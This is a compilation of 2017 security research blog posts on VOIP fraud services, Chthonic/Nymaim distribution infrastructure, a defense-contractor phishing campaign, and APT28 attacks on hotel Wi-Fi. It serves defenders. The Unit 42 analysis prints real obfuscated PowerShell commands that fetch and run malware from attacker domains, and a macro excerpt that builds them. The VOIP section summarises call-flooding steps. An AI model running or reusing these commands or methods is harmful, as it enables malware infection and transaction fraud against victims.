A previously-private VOIP service named “Narayana” – a Sanskrit term meaning “an individual who offers sanctuary” – was first advertised on two different Russian-language cybercriminal forums in the first quarter of 2017. According to an advertisement, Narayana boasts the following features:

  • Supports Session Initiation Protocol (SIP), a protocol that defines elements of telephone calls and multimedia communication sessions made over IP networks, allowing any smartphone, computer, or IP telephone to use the service
  • SIM cards based on the GSM (Global System for Mobile communication) standard for almost any country on earth, allowing phone calls and Internet access
  • Free iNum number for each user. iNum is a platform for making free international calls between numbers within the network
  • Creation of a virtual number for receiving calls and SMS messages in more than ten different countries
  • Extended inbound call routing through Direct Inward Dialing (DID)
  • Availability of “pitch shifting,” which shifts the tone of the speaker’s voice
  • Ability to redirect and respond to incoming SMS messages on Jabber (XMPP)
  • Assurance that no customer personal data is saved, including IP addresses or user-agent information
  • Ability to block third parties, including roaming partners, from seeing any call information
  • Options for making inexpensive phone calls from Russia to the U.S. with reduced audio to confirm transactions and transfers made with compromised payment information
  • Support for forced TLS/ SRTP (Transport Layer Security)/ (Secure Real-time Transport Protocol) encryption during SIP calls to prevent traffic interception

Much of Narayana’s appeal among Russian-speaking cybercriminals also stems from it’s ease of use and affordability. Upon registering an account with Narayana’s website, users are assigned phone numbers as well as login credentials for the service’s SIP server where caller ID configurations can be altered. The cost of renting a virtual number varies by country but begins at 10 euro per month; purchasing an international SIM card through the service costs 30 euro.

Image 1: The personal information page for a Narayana user; overlaid text is Flashpoint’s translation.


Another VOIP service called SIP24 was first advertised on an elite Russian-language cybercrime forum in June 2016. Although SIP24 and Narayana have similar features and functionality, SIP24 is available by invitation only, has reportedly higher call quality, and has additional features and restrictions aimed to bolster security. Specifically, SIP24 has banned caller IDs displaying Russian numbers for both domestic and international calls; the service also encourages the complementary use of freeware “Zoiper” to further enhance security and anonymity.

SIP Killer

SIP Killer is another VOIP service that has been discussed on and off for several years on various Russian-language cybercrime forums, as well as on AlphaBay prior to the market’s takedown. SIP Killer is used primarily to enable “call-flooding” — a tactic where criminals send high volumes of call traffic over a VOIP service in an effort to render a particular call service unavailable.

In fact, in December 2016, a well-known member of a Russian-language hacking forum offered a popular tutorial on how to carry out call-flooding attacks via SIP Killer. According to this individual, all a user needs to do is register ten to fifteen accounts on the website “Zadamra,” then click the “Settings” tab and then “SIP settings.” After entering login data, the SIP Killer is launched and the user can carry out call-flooding for a variety of malicious ends, including preventing the call verification of fraudulent orders. The goal is to overload a victim’s telephone with so many calls that legitimates calls — such as those seeking to verify or inform a victim of an online order or transaction — become “buried” and go unnoticed, or never make it through to the intended recipient.


Given cybercriminals’ longstanding interest in online transaction fraud and widespread determination to circumvent anti-fraud protections, VOIP services that enable users to rent virtual phone numbers and purchase SIM cards for countries around the world will likely continue to proliferate throughout the Deep & Dark Web, and it is important to recognize that instances of online transaction fraud have the potential to increase as a result. This information is especially relevant for financial institutions and e-commerce retailers, many of which may be unable to differentiate between legitimate transaction confirmation calls and fraudulent ones made and/or received by criminals using VOIP services.

The post VOIP Services Utilized for Fraud Proliferate Across Russian-Language Underground appeared first on Flashpoint.

Go to Source
Author: Justin Rogers

The Curious Case of Notepad and Chthonic: Exposing a Malicious Infrastructure

Recently, I’ve been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear. This posting is a follow-up of my previous work on this subject in  “Pulling Back the Curtains on EncodedCommand PowerShell Attacks”.

In a sample I recently analyzed, something stood out as extremely suspicious which led me down a rabbit hole, uncovering malicious infrastructure supporting Chthonic, Nymaim, and other malware and malicious websites.

Throughout this blog post I present my analysis and thought process during this research, but if you would just like a list of the findings, they are over on our Unit42 GitHub.

One of these things is not like the others…

Most commonly, PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious – typically downloading the “real” malware to run. I focused my hunting on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it’s worth digging into further based on “uniqueness” and functionality.

In this case, the first sample I looked at stood out for another reason entirely. If you take a look at the below PowerShell, you’ll quickly understand why.

<null> , cMd.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://notepad-plus-plus[.]org/repository/7.x/7.4.2/npp.7.4.2.Installer.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"

This code downloads a file from the legitimate Notepad++ website. My initial thought was the worst-case scenario – they’ve been compromised and are distributing malware! I immediately downloaded the file from the website, but everything looked normal. Of course, I had to investigate further.

The sample stayed true to the previous outline I laid out for these attacks: the Microsoft Excel document appeared to be a lure about financial information, specifically a VAT invoice written in Polish as shown below.


Looking under the hood we see the VBA code that builds the PowerShell command and launches it but something seemed off. There are a ton of functions that are clearly decoding information from arrays after which it executes an already decoded PowerShell command. I decided to debug the macro and see exactly what it’s doing before I made any decisions.


If you look at the above image, there are five things to note.

1. The variable ‘horrorr’ (double ‘r’) is the result of all of the previously mentioned decoding functions. This builds a PowerShell command.

2.You can see ‘Shelleeeee horrorr, 0’ commented out, I believe this was intended to launch the previous PowerShell command.

3. The ‘Debug.Print horrorr’ prints the content of that variable in the ‘Immediate’ area shown in the screenshot. The domain in this command is NOT ‘notepad-plus-plus.org’ and can be seen below.

cMd.exe   /c "p^Ow^ERS^hel^l^.e^x^e^  -nO^l -No^Ni^Nt^  -W^InDO^ws^ 1 -NoprO^FIle^  -eX^Ec^U  B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://farhenzel[.]co/gls.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"

4. The ‘MsgBox’ will pop-up and not display anything, because the variable passed is ‘horror’ (1 ‘r’) along with the message ‘Do you really think I’m not a virus?’ in Polish.

5. The hard coded PowerShell command with ‘notepad-plus-plus.org’ will run.

The most likely conclusion that can be drawn here is that an analyst or researcher obtained this file, modified it to see the content (misspelling the variable name along the way) post-decoding, and uploaded it to see what it did in a sandbox. To be sure though, I needed to find other samples and see how they stacked up against this one.

Going back to the PowerShell command, the initial reason I stopped to look at it was due to the way they concatenated variables to form the download command and output. This also provides a perfect pivot point to hunt for samples. Using the below string to search Process Activity in AutoFocus revealed 171 samples.


The dates were all fairly recent, having been received in the past few days since the beginning of August. The documents shared the same themes for lures but the VBA macro and resulting PowerShell were more along the lines of what I expected.

For sample “538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87” the following is an excerpt from the VBA macro building the PowerShell command.

tntcurier = "$fos=''" + "',''';$hit='df" + "il';$fd=');sta';$dr='(ne';$ed" + "='ject '" + ";$ipo='syst';$kos='t.we';$rem='ent).do';$sad"
tntcurier = tntcurier + "='wn" + "l" + "oa';$kp" + "='w-" + "ob'" + ";$nim='e(''" + "';$mo='" + cautrunova(2) + "';$" + "uy='" + cautrunova(2) + "';$ji" + "='" + cautrunova(2) + ".e" + "x';$po" + "l='em." + "ne';$oe='e''';$jik='rt-p" + "ro';$naw='c" + "ess ''';$lim='bc" + "li';I" + "nv" + "oke-E" + "xp" + "ression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'h" + "t" + "t" + "ps:" + "//naiillad." + "dat" + "e/u" + "3." + poro + "xe" + "'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"

Along with the subsequent Process Activity using the newly built PowerShell command, which aligns with what was commented out of the first sample analyzed.

WindowsSysWOW64cmd.exe , cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='tt';$uy='lf';$ji='qo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://naiillad[.]date/u3.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"

Given this, I iterated over all 171 samples and extracted the following URL’s where PowerShell is downloading a payload.


Pass the Chthonic

Going back to the Process Activity, we can see the SHA256 value of each downloaded file and compile a list of hashes for further pivoting as shown below.


After iterating over the 171 samples, we’re left with this list of hashes for the downloaded files. Note that there are fewer payloads than there are samples, indicating many of the documents download the same payload.

Below is a table with the compile date and some PDB strings found within a few of the binaries. Most of the compile times are within the past two months, with 6 in August and a couple from as recently as two days ago at the time of this writing.

SHA256 Compile Date PDB String
29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad 2016-12-10 01
d5e56b9b5f52293b209a60c2ccd0ade6c883f9d3ec09571a336a3a4d4c79134b 2016-12-10 03 C:RAMDriveCharlesheavenreamsTeac.pdb
dd5f237153856d19cf20e80ff8238ca42047113c44fae27b5c3ad00be2755eea 2016-12-10 16 C:CleaneramuserangAutoPopulatela.pdb
a5001e9b29078f532b1a094c8c16226d20c03922e37a4fca2e9172350bc160a0 2016-12-20 18
8284ec768a06b606044defe2c2da708ca6b3b51f8e58cb66f61bfca56157bc88 2017-07-05 10
f0ce51eb0e6c33fdb8e1ccb36b9f42139c1dfc58d243195aedc869c7551a5f89 2017-07-09 20 C:TableAdapterencyclopediaParik.pdb
145d47f4c79206c6c9f74b0ab76c33ad0fd40ac6724b4fac6f06afec47b307c6 2017-07-10 08 C:ayakhninreprductivedistortedc.pdb
dc8f34829d5fede991b478cf9117fb18c32d639573a827227b2fc50f0b475085 2017-07-11 01 C:positioningscrappingSzetsthi.pdb
7fe1069c118611113b4e34685e7ee58cb469bda4aa66a22db10842c95f332c77 2017-07-11 02 C:NeXTvolatilelegacyExchangeDNs.pdb
5edf117e7f8cd176b1efd0b5fd40c6cd530699e7a280c5c7113d06e9c21d6976 2017-07-12 23
2a80fdda87127bdc56fd35c3e04eb64a01a159b7b574177e2e346439c97b770a 2017-07-13 00
a9021e253ae52122cbcc2284b88270ceda8ad9647515d6cca96db264a76583f5 2017-07-18 00
dd639d76ff6f33bbfaf3bd398056cf4e95e27822bd9476340c7703f5b38e0183 2017-07-18 00
e5a00b49d4ab3e5a3a8f60278b9295f3d252e3e04dadec2624bb4dcb2eb0fada 2017-07-24 17
6263730ef54fbed0c2d3a7c6106b6e8b12a6b2855a03e7caa8fb184ed1eabeb2 2017-07-24 22 C:SnapshotDiskettehidingROCKMA.pdb
43bfaf9a2a4d46695bb313a32d88586c510d040844f29852c755845a5a09d9df 2017-07-25 06
b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628 2017-07-25 06 C:mdbChangedContainerpraise.pdb
9acdad02ca8ded6043ab52b4a7fb2baac3a08c9f978ce9da2eb51c816a9e7a2e 2017-07-25 07
2ddaa30ba3c3e625e21eb7ce7b93671ad53326ef8b6e2bc20bc0d2de72a3929d 2017-07-25 20 C:helpersbetterExprEightDS.pdb
b836576877b2fcb3cacec370e5e6a029431f59d5070da89d94200619641ca0c4 2017-07-26 12 C:VregardviolatesupdateAMBWa.pdb
0972fc9602b00595e1022d9cfe7e9c9530d4e9adb5786fea830324b3f7ff4448 2017-07-26 20
2c258ac862d5e31d8921b64cfa7e5a9cd95cca5643c9d51db4c2fcbe75fa957a 2017-07-27 01 C:executableryconstructedIIc.pdb
dd9c558ba58ac81a2142ecb308ac8d0f044c7059a039d2e367024d953cd14a00 2017-07-27 02
cb3173a820ac392005de650bbd1dd24543a91e72d4d56300a7795e887a8323b2 2017-07-31 14 C:letterbxingEVPChiceslegit.pdb
a636f49814ea6603534f780b83a5d0388f5a5d0eb848901e1e1bf2d19dd84f05 2017-07-31 18 C:Biomusemoment705cnvincing.pdb
677dd11912a0f13311d025f88caabeeeb1bda27c7c1b5c78cffca36de46e8560 2017-07-31 21
fdedf0f90d42d3779b07951d1e8826c7015b3f3e724ab89e350c9608e1f23852 2017-08-01 21
142bf7f47bfbd592583fbcfa22a25462df13da46451b17bb984d50ade68a5b17 2017-08-02 09
6f4b2c95b1a0f320da1b1eaa918c338c0bab5cddabe169f12ee734243ed8bba8 2017-08-02 12 C:catalogingDrVarianceShadows11.pdb
fd5fd7058cf157ea249d4dcba71331f0041b7cf8fd635f37ad13aed1b06bebf2 2017-08-04 02 C:dumplingsThatBITWarezloc.pdb
5785c2d68d6f669b96c3f31065f0d9804d2ab1f333a90d225bd993e66656b7d9 2017-08-07 12 C:Lgisyshypothesizeddonatedc.pdb
675719a9366386034c285e99bf33a1a8bafc7644874b758f307d9a288e95bdbd 2017-08-07 17 C:workcrnatacppsevensevenreleaseseven.pdb

At least one of the binaries compiled in August had a PDB string I was able to locate online in a collection of other PDB files, so they may be introducing their malicious code into these files before compiling someone else’s project.

Once the file has been downloaded and executed, the new process will launch a legitimate executable, such as “msiexec.exe”, and inject code into it. This code will then download further payloads through a POST request to various websites. This pattern is shared across the original samples.


These HTTP requests match known patterns for a banking Trojan named Chthonic, which is a variant of Zeus. A good write-up from 2014 on the malware can be found in this writeup from Yury Namestnikov, Vladimir Kuskov, Oleg Kupreev at Kaspersky Lab here and indicates that the returned data is an RC4 encrypted loader that sets-up the main Chthonic module which can download additional modules or malware.

A dab of Nymaim

Iterating once again over the 171 samples and scraping out the HTTP POST requests, I ended up with the below set of domains.


Using this as the next pivot, we have 6,034 unique samples that get returned in AutoFocus having made POST requests to these sites. Additionally, we can see there were at least 3 very large campaigns where Palo Alto Networks saw activity to these sites in July.

From these distribution sites, we can see that 5,520 samples are making HTTP requests to them and these samples have been identified as another downloader Trojan named Nymaim.

The majority of the overall samples came from the following four sites.


The ‘ejtmjealr[.]com’ domain is particularly interesting due to a similar domain, ‘ejdqzkd[.]com’ being discussed by Jarosław Jedynak of CERT.PL in this analysis of Nymaim from earlier in the year. They go on to discuss how Nymaim uses a static configuration to contact that domain, which will return IP’s that go into a DGA and output the actual IP addresses needed for C2 communication. Ben Baker, Edmund Brumaghin and Jonah Samost of Talos have a fantastic write-up of this process here.

Raising the dead – Infrastructure Archeology

To continue my analysis, I shifted focus to Maltego so as to visually graph the infrastructure. For this task, I used PassiveTotal’s Passive DNS and AutoFocus Maltego transforms. We see below the passive resolutions for these domains and how it reveals a number of IP addresses being shared between the four domains identified above.


All of the 707 IP addresses can be found here. Note that while these IP’s have been found to be hosting malicious content, this could change in the future.

Pivoting off the five highlighted IP’s above with a shared infrastructure, I pulled the reverse DNS to see what other sites may be present. The below is a sampling of the domains returned through this process.


The “idXXXXX.top” pattern immediately stands out and may suggest a pattern in the static configuration for the initial domains used by the DGA for Nymaim since the previous two started with “ejX.com.

Given the level of overlap already, I proceeded to grab all of the passive DNS available for each of the 707 IP addresses. A full list of the domains can be seen here. The below Maltego graph is used to simply illustrate the two distinct clusters of infrastructure that appeared and their interconnectedness.


From the first cluster on the left, if we sort by incoming links per node a pattern stands out in the domain names looking similar to the previously mentioned Nymaim ones. In the below image, the top domains are sorted by incoming links on the right side. Each link is a corresponding IP address and show that these domains have been rotated quite a bit between the infrastructure.


A quick search with the AutoFocus transform to pull tag information shows these are specifically related to Nymaim, most likely for the DGA seed; however, looking at domains with less links, other malware families begin to emerge.

The cluster on the right is actually collapsing one collection of entities due to the sheer size of it. Below is the collection expanded in all of its glory.


Below are the domain names linked to the singular IP address in the center.


All of these connected domains follow a pattern similar to phishing attacks masquerading as legitimate services – in this case “online.verify[.]paypal” (588) and “hmrc.secure[.]refund” (1021).

In addition to domains of that type, there is evidence of other malware distribution being carried out on this infrastructure. Collapsing the collection back down, note the two domains “brontorittoozzo[.]com” and “randomessstioprottoy[.]net” that fall outside of the collection due to more infrastructure connections.


A quick search for these domains will land you on fellow Unit 42 researcher Brad Duncan’s malware-traffic-analysis (MTA) site for post “2017-06-22 – LOCKY MALSPAM – PDF ATTACHMENTS WITH EMBEDDED .DOCM FILES” in which he lists out URL’s found within malicious Microsoft Word documents that download Locky as shown below.


In some of the other smaller clusters, you’ll find groupings of like malicious sites.

For example, there is a group with gems like “premarket[.]ws” like you see below being hosted on this shared infrastructure, which is a forum for less than legal services.


Along with sites like “slilpp[.]ws” which is another less than reputable site as shown below.


Which ironically has a Twitter support account that specifically states the following.


And yet another here below…


There are 632 people happily following along with relatively easy to track down accounts and usernames. A substantial amount of these accounts, on quick review, appear to follow the typical Nigerian cybercrime patterns detailed in other blogs.

Finally, there were multiple clusters of domains used by the Hancitor malware dropper to host the initial check-in and tracking as shown here.


Which can be seen as having been used in a campaign on July 03, 2017 via a post on MTA below.



By pivoting off of one sample we were able to zoom out and identify a sizable infrastructure of what appears to be 707 IP’s and 2,611 domains being utilized for malicious activity.

As such, these findings represent a collection of compromised websites, compromised registrar accounts used to spin up subdomains, domains used by malware DGA’s, phishing kits, carding forums, malware C2 sites, and a slew of other domains that revolve around criminal activity.

Hopefully this analysis has been helpful in understanding how truly connected some of these infrastructures can be and how with a little digging, you can uncover a substantial amount of operationally useful indicators to protect you and yours.

AutoFocus users can identify and track these threats using the Chthonic, Nymaim, and NotepadInfrastructure tags.

The post The Curious Case of Notepad and Chthonic: Exposing a Malicious Infrastructure appeared first on Palo Alto Networks Blog.

Go to Source
Author: Jeff White

The Blockbuster Saga Continues

Unit 42 researchers at Palo Alto Networks have discovered new attack activity targeting individuals involved with United States defense contractors. Through analysis of malicious code, files, and infrastructure it is clear the group behind this campaign is either directly responsible for or has cooperated with the group which conducted Operation Blockbuster Sequel and, ultimately, Operation Blockbuster (originally outlined  by researchers from Novetta). The threat actors are reusing tools, techniques, and procedures which overlap throughout these operations with little variance. Attacks originating from this threat group have not ceased since our previous report (from April of 2017) and have continued through July of 2017.

New Activity

Recently, we’ve identified weaponized Microsoft Office Document files which use the same malicious macros as attacks from earlier this year. Based on the contents of these latest decoy documents which are displayed to a victim after opening the weaponized document the attackers have switched targets from Korean language speakers to English language speakers. Most notably, decoy document themes now include job role descriptions and internal policies from US defense contractors.

The following image shows the content of one of the recent decoy documents (de2d458c8e4befcd478a0010789d80997793790b18a347d10a595d6e87d91f34). It is a job description at a defense contractor.


The following images also shows the contents of a recent decoy document (062aadf3eb69686f4881860d88ce472e6b1c07e1f586d840dd2ee1f7b76cabe7). It contains an exact copy of a publicly available job description, including typos, at a US defense contractor.


The weaponized documents have been hosted on systems which we believe have likely been compromised and repurposed. Two of the URL paths used to host the weaponized documents on the compromised systems are exact matches (event/careers/jobs/description/docs). The payloads delivered by the weaponized documents are extremely similar to the payloads delivered by weaponized documents detailed in our April 2017 report on the threat group’s activity.

For a more comprehensive understanding of the relationships between samples and infrastructure used in the recent activity see the following network graph.


The document metadata Author “ISkyISea” is used across multiple weaponized document files. IPv4 addresses (210.202.40[.]35) hosting the weaponized documents have also been hardcoded as command and control servers for previous samples (16c3a7f143e831dd0481d2d57aae885090e22ec55cc8282009f641755d423fcd).

Ties to Blockbuster

The source code used in the macros embedded in the weaponized documents described above was also detailed in a previous report where it was included in testing documents uploaded to VirusTotal. This reuse of macro source code, XOR keys used within the macro to decode implant payloads, and the functional overlap in the payloads the macros write to disk demonstrates the continued use of this tool set by this threat group. The use of an automated tool to build the weaponized documents would explain the common but not consistent reuse of metadata, payloads, and XOR keys within the documents.

Other similarities between the previously reported activity and this new activity can be seen within the PE payloads written to disk by the malicious documents. The payloads function similarly to other implants associated with this threat group. The use of a fake TLS communications protocol, encoded strings within samples, filenames and contents of batch files embedded within implants, as well implants beaconing directly to IPv4 addresses (and not resolving domains for command and control) are all known techniques associated with the threat group. These tactics have changed very little since the original Operation Blockbuster.

In addition to tool reuse, infrastructure overlaps also exist. URLs used for hosting the malicious documents and IPv4 addresses used for command and control overlap with infrastructure previously used by the group.

Final Thoughts

The techniques and tactics the group uses have changed little in recent attacks. Tool and infrastructure overlaps with previous campaigns are apparent. Given that the threat actors have continued operations despite their discovery and public exposure it is likely they will continue to operate and launch targeted campaigns.

Palo Alto Networks researchers will continue to monitor this group’s activities and stay abreast to additional attacks using this tool set.

  • The malicious files describe in this report are flagged as malicious by WildFire and in Threat Prevention.
  • AutoFocus users can learn more about the threat group and their indicators by examining the BlockBuster_Sequel tag.

Indicators of Compromise































The post The Blockbuster Saga Continues appeared first on Palo Alto Networks Blog.

Go to Source
Author: Anthony Kasza

APT28 Targets Hospitality Sector, Presents Threat to Travelers

FireEye has moderate confidence that a campaign targeting the
hospitality sector is attributed to Russian actor APT28.
We believe this activity, which dates back to at least July 2017, was
intended to target travelers to hotels throughout Europe and the
Middle East. The actor has used several notable techniques in these
incidents such as sniffing passwords from Wi-Fi traffic, poisoning the
NetBIOS Name Service, and spreading laterally via the EternalBlue exploit.

APT28 Uses Malicious Document to Target Hospitality Industry

FireEye has uncovered a malicious document sent in spear phishing
emails to multiple companies in the hospitality industry, including
hotels in at least seven European countries and one Middle Eastern
country in early July. Successful execution of the macro within the
malicious document results in the installation of APT28’s signature GAMEFISH malware.

The malicious document – Hotel_Reservation_Form.doc (MD5:
9b10685b774a783eabfecdb6119a8aa3), as seen in Figure 1 – contains a
macro that base64 decodes a dropper that then deploys APT28’s
signature GAMEFISH malware (MD5: 1421419d1be31f1f9ea60e8ed87277db),
which uses mvband.net and mvtband.net as command and control (C2) domains.

Figure 1: Hotel_Reservation_Form.doc
(MD5: 9b10685b774a783eabfecdb6119a8aa3)

APT28 Uses Novel Techniques to Move Laterally and Potentially
Target Travelers

APT28 is using novel techniques involving the EternalBlue exploit
and the open source tool Responder to spread
laterally through networks and likely target travelers. Once inside
the network of a hospitality company, APT28 sought out machines that
controlled both guest and internal Wi-Fi networks. No guest
credentials were observed being stolen at the compromised hotels;
however, in a separate incident that occurred in Fall 2016, APT28
gained initial access to a victim’s network via credentials likely
stolen from a hotel Wi-Fi network.

Upon gaining access to the machines connected to corporate and guest
Wi-Fi networks, APT28 deployed Responder. Responder facilitates
NetBIOS Name Service (NBT-NS) poisoning. This technique listens for
NBT-NS (UDP/137) broadcasts from victim computers attempting to
connect to network resources. Once received, Responder masquerades as
the sought-out resource and causes the victim computer to send the
username and hashed password to the attacker-controlled machine. APT28
used this technique to steal usernames and hashed passwords that
allowed escalation of privileges in the victim network.

To spread through the hospitality company’s network, APT28 used a
version of the EternalBlue SMB exploit. This was combined with the
heavy use of py2exe to compile Python scripts. This is the first time
we have seen APT28 incorporate this exploit into their intrusions.

In the 2016 incident, the victim was compromised after connecting to
a hotel Wi-Fi network. Twelve hours after the victim initially
connected to the publicly available Wi-Fi network, APT28 logged into
the machine with stolen credentials. These 12 hours could have been
used to crack a hashed password offline. After successfully accessing
the machine, the attacker deployed tools on the machine, spread
laterally through the victim’s network, and accessed the victim’s OWA
account. The login originated from a computer on the same subnet,
indicating that the attacker machine was physically close to the
victim and on the same Wi-Fi network.

We cannot confirm how the initial credentials were stolen in the
2016 incident; however, later in the intrusion, Responder was
deployed. Since this tool allows an attacker to sniff passwords from
network traffic, it could have been used on the hotel Wi-Fi network to
obtain a user’s credentials.

Long-Standing Threats to Travelers

Cyber espionage activity against the hospitality industry is
typically focused on collecting information on or from hotel guests of
interest rather than on the hotel industry itself, though actors may
also collect information on the hotel as a means of facilitating
operations. Business and government personnel who are traveling,
especially in a foreign country, often rely on systems to conduct
business other than those at their home office, and may be unfamiliar
with threats posed while abroad.

APT28 isn’t the only group targeting travelers. South Korea-nexus
Fallout Team (aka Darkhotel) has used spoofed
software updates on infected Wi-Fi networks in Asian hotels
, and
Duqu 2.0 malware has been found
on the networks of European hotels
used by participants in the
Iranian nuclear negotiations. Additionally, open sources have reported
for several years that in Russia and China, high-profile hotel guests
may expect their hotel
rooms to be accessed and their laptops and other electronic devices accessed

Outlook and Implications

These incidents show a novel infection vector being used by APT28.
The group is leveraging less secure hotel Wi-Fi networks to steal
credentials and a NetBIOS Name Service poisoning utility to escalate
privileges. APT28’s already wide-ranging capabilities and tactics are
continuing to grow and refine as the group expands its infection vectors.

Travelers must be aware of the threats posed when traveling –
especially to foreign countries – and take extra precautions to secure
their systems and data. Publicly accessible Wi-Fi networks present a
significant threat and should be avoided whenever possible.

Go to Source

Author: Lindsay Smith